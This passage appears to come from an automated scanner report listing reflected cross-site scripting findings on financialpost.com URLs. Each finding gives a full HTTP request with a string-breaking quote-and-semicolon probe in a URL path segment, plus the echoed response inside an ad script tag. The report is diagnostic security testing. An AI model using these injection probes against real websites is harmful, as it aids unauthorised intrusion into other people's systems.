<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/hidden%20angels%20magnet%20aspiring%20startups/3967315/a9386';ab3ee5a69d/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=hidden%20angels%20magnet%20aspiring%20startups;kw=3967315;kw=a9386';ab3ee5a69d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcook
...[SNIP]...

1.62. http://www.financialpost.com/entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba574'%3b9b0c1337c4a was submitted in the REST URL parameter 1. This input was echoed as ba574';9b0c1337c4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneurba574'%3b9b0c1337c4a/Partners+leverage+gift+card+idea/3931988/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82924
Expires: Sun, 19 Dec 2010 03:14:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurba574';9b0c1337c4a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurba574';9b0c1337c4a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=36654678?">
...[SNIP]...

1.63. http://www.financialpost.com/entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 547fc'%3b614300144fa was submitted in the REST URL parameter 3. This input was echoed as 547fc';614300144fa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Partners+leverage+gift+card+idea/3931988547fc'%3b614300144fa/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54486
Expires: Sun, 19 Dec 2010 03:14:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/partners-leverage-gift-card-idea/3931988547fc';614300144fa/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=partners-leverage-gift-card-idea;kw=3931988547fc';614300144fa;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag
...[SNIP]...

1.64. http://www.financialpost.com/entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38251'%3b14ab344cd5d was submitted in the REST URL parameter 4. This input was echoed as 38251';14ab344cd5d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Partners+leverage+gift+card+idea/3931988/38251'%3b14ab344cd5d HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37570


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/partners%20leverage%20gift%20card%20idea/3931988/38251';14ab344cd5d/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=partners%20leverage%20gift%20card%20idea;kw=3931988;kw=38251';14ab344cd5d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag
...[SNIP]...

1.65. http://www.financialpost.com/entrepreneur/Social+media+gives+medium+life/3931982/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Social+media+gives+medium+life/3931982/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2289'%3bea2284d08bf was submitted in the REST URL parameter 1. This input was echoed as b2289';ea2284d08bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneurb2289'%3bea2284d08bf/Social+media+gives+medium+life/3931982/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78583
Expires: Sun, 19 Dec 2010 03:14:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurb2289';ea2284d08bf/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurb2289';ea2284d08bf;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=25921326?">
...[SNIP]...

1.66. http://www.financialpost.com/entrepreneur/Social+media+gives+medium+life/3931982/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Social+media+gives+medium+life/3931982/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 314a3'%3b231830f9dd8 was submitted in the REST URL parameter 3. This input was echoed as 314a3';231830f9dd8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Social+media+gives+medium+life/3931982314a3'%3b231830f9dd8/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54415
Expires: Sun, 19 Dec 2010 03:14:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/social-media-gives-medium-life/3931982314a3';231830f9dd8/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=social-media-gives-medium-life;kw=3931982314a3';231830f9dd8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'
...[SNIP]...

1.67. http://www.financialpost.com/entrepreneur/Social+media+gives+medium+life/3931982/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Social+media+gives+medium+life/3931982/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afc98'%3ba15a08852bc was submitted in the REST URL parameter 4. This input was echoed as afc98';a15a08852bc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Social+media+gives+medium+life/3931982/afc98'%3ba15a08852bc HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44342


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/social%20media%20gives%20medium%20life/3931982/afc98';a15a08852bc/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=social%20media%20gives%20medium%20life;kw=3931982;kw=afc98';a15a08852bc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+s
...[SNIP]...

1.68. http://www.financialpost.com/entrepreneur/Strategy+comes+easy/3931965/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Strategy+comes+easy/3931965/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f775e'%3b6b7ab346bbb was submitted in the REST URL parameter 1. This input was echoed as f775e';6b7ab346bbb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneurf775e'%3b6b7ab346bbb/Strategy+comes+easy/3931965/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81970
Expires: Sun, 19 Dec 2010 03:14:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneurf775e';6b7ab346bbb/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneurf775e';6b7ab346bbb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=45520954?">
...[SNIP]...

1.69. http://www.financialpost.com/entrepreneur/Strategy+comes+easy/3931965/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Strategy+comes+easy/3931965/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6435'%3b4f2bbbc1920 was submitted in the REST URL parameter 3. This input was echoed as b6435';4f2bbbc1920 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Strategy+comes+easy/3931965b6435'%3b4f2bbbc1920/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 54006
Expires: Sun, 19 Dec 2010 03:14:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/strategy-comes-easy/3931965b6435';4f2bbbc1920/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=strategy-comes-easy;kw=3931965b6435';4f2bbbc1920;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=3973656
...[SNIP]...

1.70. http://www.financialpost.com/entrepreneur/Strategy+comes+easy/3931965/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Strategy+comes+easy/3931965/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 645f3'%3b095502b1fd7 was submitted in the REST URL parameter 4. This input was echoed as 645f3';095502b1fd7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Strategy+comes+easy/3931965/645f3'%3b095502b1fd7 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44013


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/strategy%20comes%20easy/3931965/645f3';095502b1fd7/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=strategy%20comes%20easy;kw=3931965;kw=645f3';095502b1fd7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord
...[SNIP]...

1.71. http://www.financialpost.com/entrepreneur/Virtual+training/3967328/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Virtual+training/3967328/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6640b'%3b10be691c8d7 was submitted in the REST URL parameter 1. This input was echoed as 6640b';10be691c8d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur6640b'%3b10be691c8d7/Virtual+training/3967328/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83218
Expires: Sun, 19 Dec 2010 03:14:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur6640b';10be691c8d7/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur6640b';10be691c8d7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=50079065?">
...[SNIP]...

1.72. http://www.financialpost.com/entrepreneur/Virtual+training/3967328/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Virtual+training/3967328/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb40f'%3b9d8ba420d75 was submitted in the REST URL parameter 3. This input was echoed as eb40f';9d8ba420d75 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Virtual+training/3967328eb40f'%3b9d8ba420d75/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 53895
Expires: Sun, 19 Dec 2010 03:14:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/virtual-training/3967328eb40f';9d8ba420d75/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=virtual-training;kw=3967328eb40f';9d8ba420d75;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68303724?"
...[SNIP]...

1.73. http://www.financialpost.com/entrepreneur/Virtual+training/3967328/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/Virtual+training/3967328/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7504a'%3b07f3b9742b1 was submitted in the REST URL parameter 4. This input was echoed as 7504a';07f3b9742b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/Virtual+training/3967328/7504a'%3b07f3b9742b1 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44723


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/virtual%20training/3967328/7504a';07f3b9742b1/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=virtual%20training;kw=3967328;kw=7504a';07f3b9742b1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=7895
...[SNIP]...

1.74. http://www.financialpost.com/entrepreneur/advice/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/advice/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74d93'%3be0889b50b05 was submitted in the REST URL parameter 1. This input was echoed as 74d93';e0889b50b05 in the application's response.

